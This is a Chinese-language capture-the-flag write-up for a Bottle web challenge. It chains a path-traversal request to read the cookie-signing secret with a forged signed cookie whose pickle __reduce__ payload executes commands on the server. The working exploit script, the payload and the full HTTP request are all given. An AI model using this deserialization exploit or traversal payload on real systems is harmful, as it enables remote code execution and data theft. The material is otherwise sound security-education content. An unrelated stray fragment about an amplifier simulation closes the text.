源代码
# -*- encoding: utf-8 -*-
'''
@File : main.py
@Time : 2025/03/28 22:20:49
@Author : LamentXU
'''
'''
flag in /flag_{uuid4}
'''
from bottle import Bottle, request, response, redirect, static_file, run, route
secret = 'a'app = Bottle()
@route('/')
def index():return '''HI'''
@route('/download')
def download():name = request.query.filenameif '../../' in name or name.startswith('/') or name.startswith('../') or '\\' in name:response.status = 403return 'Forbidden'with open(name, 'rb') as f:data = f.read()return data@route('/secret')
def secret_page():try:session = request.get_cookie("name", secret=secret)if not session or session["name"] == "guest":session = {"name": "guest"}response.set_cookie("name", session, secret=secret)return 'Forbidden!'if session["name"] == "admin":return 'The secret has been deleted!'except:return "Error!"
run(host='0.0.0.0', port=8080, debug=True)
先使用目录穿越获得密钥
/download?filename=./.././../secret.txt
审计库源代码发现存在反序列化漏洞
def get_cookie(self, key, default=None, secret=None, digestmod=hashlib.sha256):"""获取 cookie 的值。如果要读取一个“签名的 Cookie”,则 `secret` 必须与创建 cookie 时使用的密钥一致(参见 BaseResponse.set_cookie 方法)。如果读取失败(cookie 不存在或签名不正确),则返回默认值 `default`。"""# 从 self.cookies 中获取名为 key 的 cookie 值value = self.cookies.get(key)# 如果提供了 secret,说明需要验证签名(签名的 Cookie)if secret:# 检查 cookie 是否存在,并且以 '!' 开头,同时包含 '?'# 这是签名 cookie 的格式标志,例如: "!签名?内容"if value and value.startswith('!') and '?' in value:# 拆分签名和消息部分,并将其转为字节sig, msg = map(tob, value[1:].split('?', 1))# 使用提供的 secret 和消息体生成 HMAC 签名hash = hmac.new(tob(secret), msg, digestmod=digestmod).digest()# 将生成的签名进行 base64 编码,与传入的签名进行比较if _lscmp(sig, base64.b64encode(hash)):# 签名验证通过后,对消息部分进行 base64 解码,然后反序列化dst = pickle.loads(base64.b64decode(msg))# 确保反序列化后的对象是一个包含 key 和值的元组,并且 key 匹配if dst and dst[0] == key:return dst[1] # 返回解密后的 cookie 值# 如果任何一步失败,则返回默认值return default# 如果没有启用签名验证,直接返回原始的 cookie 值或默认值return value or default
伪造cookie,诱导反序列化即可
import pickle
import hmac
import hashlib
import base64
from bottle import tobclass Evil:def __reduce__(self):return exec, ("""
result = __import__('subprocess').run(['cat','/flag_dda2d465-af33-4c56-8cc9-fd4306867b70'], capture_output=True
)
encoded = __import__('base64').b64encode(result.stdout).decode()
__import__('bottle').response.headers['X-Output'] = encoded
""",)
e = Evil()
msg = base64.b64encode(pickle.dumps(e))secret = "Hell0_H@cker_Y0u_A3r_Sm@r7"
hash = hmac.new(tob(secret), msg, digestmod=hashlib.sha256).digest()
hash = base64.b64encode(hash)print(f"""Cookie: name=\"!{str(hash)[2:-1]}?{str(msg)[2:-1]}\"""")
GET /secret HTTP/1.1
Host: eci-2ze137gfkzlk51q14vk4.cloudeci1.ichunqiu.com:5000
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: name="!kpUxGGuOD8bX1H3YEkAMzPPZiaECBAtXUDgyz110yfs=?gASVFgEAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIz6CnJlc3VsdCA9IF9faW1wb3J0X18oJ3N1YnByb2Nlc3MnKS5ydW4oCiAgICBbJ2NhdCcsJy9mbGFnX2RkYTJkNDY1LWFmMzMtNGM1Ni04Y2M5LWZkNDMwNjg2N2I3MCddLCAKICAgIGNhcHR1cmVfb3V0cHV0PVRydWUKKQplbmNvZGVkID0gX19pbXBvcnRfXygnYmFzZTY0JykuYjY0ZW5jb2RlKHJlc3VsdC5zdGRvdXQpLmRlY29kZSgpCl9faW1wb3J0X18oJ2JvdHRsZScpLnJlc3BvbnNlLmhlYWRlcnNbJ1gtT3V0cHV0J10gPSBlbmNvZGVkCpSFlFKULg=="
Connection: keep-alive
)
跨阻放大器简单仿真)
